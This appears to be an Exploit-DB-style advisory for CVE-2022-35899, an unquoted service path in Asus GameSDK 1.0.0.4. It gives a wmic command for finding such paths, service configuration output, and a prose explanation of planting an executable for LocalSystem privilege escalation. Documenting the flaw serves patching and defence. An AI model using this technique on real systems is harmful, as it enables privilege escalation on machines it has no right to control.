dfb28913d0
7 changes to exploits/shellcodes Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path rpc.py 0.6.0 - Remote Code Execution (RCE) Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution Geonetwork 4.2.0 - XML External Entity (XXE) Dingtian-DT-R002 3.1.276A - Authentication Bypass Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)
30 lines
No EOL
1.3 KiB
Text
30 lines
No EOL
1.3 KiB
Text
# Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path
|
|
# Date: 07/14/2022
|
|
# Exploit Author: Angelo Pio Amirante
|
|
# Version: 1.0.0.4
|
|
# Tested on: Windows 10
|
|
# Patched version: 1.0.5.0
|
|
# CVE: CVE-2022-35899
|
|
|
|
# Step to discover the unquoted service path:
|
|
|
|
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
|
|
|
|
# Info on the service:
|
|
|
|
C:\>sc qc "GameSDK Service"
|
|
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
|
|
|
|
NOME_SERVIZIO: GameSDK Service
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_AVVIO : 2 AUTO_START
|
|
CONTROLLO_ERRORE : 1 NORMAL
|
|
NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe
|
|
GRUPPO_ORDINE_CARICAMENTO :
|
|
TAG : 0
|
|
NOME_VISUALIZZATO : GameSDK Service
|
|
DIPENDENZE :
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
# Exploit
|
|
If an attacker had already compromised the system and the current user has the privileges to write in the "C:\Program Files (x86)\ASUS\" folder or in "C:\" , he could place his own "Program.exe" or "GameSDK.exe" files respectively, and when the service starts, it would launch the malicious file, rather than the original "GameSDK.exe". |